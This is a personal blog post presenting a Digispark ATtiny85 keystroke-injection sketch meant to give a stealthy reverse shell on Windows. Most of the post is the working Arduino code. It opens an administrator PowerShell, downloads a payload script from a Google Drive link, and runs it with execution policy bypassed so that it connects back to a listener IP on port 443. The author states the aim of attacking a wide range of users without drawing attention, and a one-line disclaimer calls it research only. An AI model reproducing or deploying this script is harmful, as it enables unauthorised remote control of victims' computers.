This week my AtTiny85 came in the mail from China and so far I am extremely impressed with the ease of not only the Digispark keyboard library but the Arduino IDE itself. I created a couple simple projects but for the most part I focused on one primary proof of concept.
Project Goal: Create a simple and quick reverse shell for windows that doesn’t draw to much attention to itself.
Now with that goal in mind I stuck to Powershell for a few reasons. First being its an extremely robust and easy to use language. Second because Powershell running on an endpoint is rarely any red flags in and of itself. Finally It is on every modern windows distribution which allows me to attack a wide range of users.
With all that in mind lets get into it:
First I picked up my hardware here: https://bit.ly/2CD6f62 for just under $5
Then I followed Thomas’s tutorial here at Hackernoon https://bit.ly/2HqMWmt
I downloaded a PS payload via github and then I was ready to go!
Finally I built my attack script:
#include “DigiKeyboard.h”
#define KEY_LEFT_ARROW 0xD8
// Powershell reverse shell https://drive.google.com/uc?export=download&id=yourdownloadhere
// Written by Jordon Lovik for research purposes only. Do not use or distribute this code for anything but education. I am no liable for any harm this script may do to you or anyone elses computer.
void setup() {
// runspeed use numbers between 50 – 2000
int runspeed = 500;
//define LED
pinMode(0, OUTPUT); //LED on Model B
pinMode(1, OUTPUT); //LED on Model A
DigiKeyboard.delay(3*runspeed);
//Turn light on
digitalWrite(0, HIGH);
digitalWrite(1, HIGH);
DigiKeyboard.sendKeyStroke(0,0);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(1*runspeed);
//Start powershell as administrator – enables you to bypass exections policy later
DigiKeyboard.println(“powershell Start-Process powershell.exe -Verb runAs”);
DigiKeyboard.delay(1*runspeed);
DigiKeyboard.sendKeyStroke(0,0);
DigiKeyboard.sendKeyStroke(KEY_LEFT_ARROW);
DigiKeyboard.delay(3*runspeed);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
//Define payload download location (make sure this is a direct download link)
DigiKeyboard.delay(3*runspeed);
DigiKeyboard.println(“$url = \”https://drive.google.com/uc?export=download&id=13DLtW-ftkkFPryAc2DzqnM7jUrZzqhQs\””);
DigiKeyboard.update();
DigiKeyboard.delay(1*runspeed);
//Grabs user name based on logged on user and stores it in $user
DigiKeyboard.println(“$user = [Environment]::UserName”);
DigiKeyboard.update();
DigiKeyboard.delay(1*runspeed);
//write to conditional output path using the desktop for debugging
DigiKeyboard.println(“$output = \”C:\\Users\\$user\\Desktop\\payload1.ps1\””);
DigiKeyboard.update();
DigiKeyboard.delay(1*runspeed);
//download the payload from the specified URL
DigiKeyboard.println(“Invoke-WebRequest -Uri $url -OutFile $output”);
DigiKeyboard.update();
DigiKeyboard.delay(3*runspeed);
//-windowstyle hidden
DigiKeyboard.println(“powershell.exe -ExecutionPolicy ByPass \”C:\\Users\\$user\\Desktop\\payload1.ps1 -dest 172.16.31.84 -port 443\””); //IP
}
void loop() {
//blink lights when script completes
digitalWrite(0, HIGH);
digitalWrite(1, HIGH);
delay(50);
digitalWrite(0, LOW);
digitalWrite(1, LOW);
delay(50);
digitalWrite(0, HIGH);
digitalWrite(1, HIGH);
delay(20);
digitalWrite(0, HIGH);
digitalWrite(1, HIGH);
delay(20);
}
JordonLovik.com 
Leave a Reply